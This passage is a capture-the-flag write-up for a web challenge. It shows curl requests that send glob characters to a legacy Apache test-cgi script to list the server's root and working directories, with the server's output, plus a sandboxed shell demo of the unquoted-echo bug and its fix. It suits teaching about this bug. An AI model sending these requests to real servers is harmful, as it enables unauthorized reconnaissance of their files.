[Web] SECTF - Sprinkler system



Sprinkler system - Web (100 + 0)

Damn New York… some chick tricked you into standing in the rain on the very first day… it’s payback time!

Solves: 238

Service: http://sprinklers.alieni.se/

Author: avlidienbrunn

Start by looking at robots.txt:

$ curl 'http://sprinklers.alieni.se/robots.txt'
User-agent: *
Disallow: /cgi-bin/test-cgi

We have a hidden path, /cgi-bin/test-cgi. My first instinct was to try Shellshock, but of course it didn't work, so after searching Google for a while I found this: http://insecure.org/sploits/test-cgi.server_protocol.html.
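Here is a small shell reproduction of the bug behind that link, added for this writeup and not taken from the challenge or the original post: the stock Apache test-cgi script printed its CGI variables with an unquoted `echo $QUERY_STRING`, so the shell expands `*` (or `/*`) against the filesystem before echo ever runs, and the quoted form beside it is the fix. The sandbox directory and the two file names inside it are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the challenge or the original writeup.
# Reproduces the test-cgi defect in a throwaway directory: the stock script
# printed its CGI variables with an unquoted `echo $QUERY_STRING`, so the
# shell performs pathname expansion on `*` (or `/*`) before echo runs.

# Constructed sandbox standing in for the server's cgi-bin directory.
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
touch "$SANDBOX/enable_sprinkler_system" "$SANDBOX/test-cgi"

# Vulnerable form: mirrors the original unquoted echo. A query of `*`
# becomes a listing of the working directory, `/*` a listing of the root.
report_unquoted() {
    QUERY_STRING="$1"
    ( cd "$SANDBOX" && echo QUERY_STRING = $QUERY_STRING )
}

# Hardened form: double quotes stop both glob expansion and word splitting,
# so the query text reaches the response exactly as it was sent.
report_quoted() {
    QUERY_STRING="$1"
    ( cd "$SANDBOX" && echo "QUERY_STRING = $QUERY_STRING" )
}

# Defensive input check for a script that must hand the value to a shell
# command anyway: succeeds only when no glob metacharacter is present.
query_is_glob_free() {
    case "$1" in
        *[*?[]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Stand-alone demonstration: the same query, both ways.
printf 'unquoted: %s\n' "$(report_unquoted '*')"
printf 'quoted:   %s\n' "$(report_quoted '*')"
```

The unquoted line prints the two constructed file names, the quoted line prints a literal `*`; the only difference between the two functions is the pair of double quotes.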

To list the root directory we can do this:

$ curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?/*'
CGI/1.0 test script report:

argc is 1. argv is /*.

SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = /app /bin /boot /dev /etc /git /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
REMOTE_HOST =
REMOTE_ADDR = 172.68.102.79
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

Nothing special in the root directory. Let's list the current directory instead: rather than ?/* at the end of the URL, we use just ?*:

$ curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?*'
CGI/1.0 test script report:

argc is 1. argv is *.

SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = enable_sprinkler_system test-cgi
REMOTE_HOST =
REMOTE_ADDR = 172.68.102.79
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH

It works! There is a file named enable_sprinkler_system. Let's see what its content is: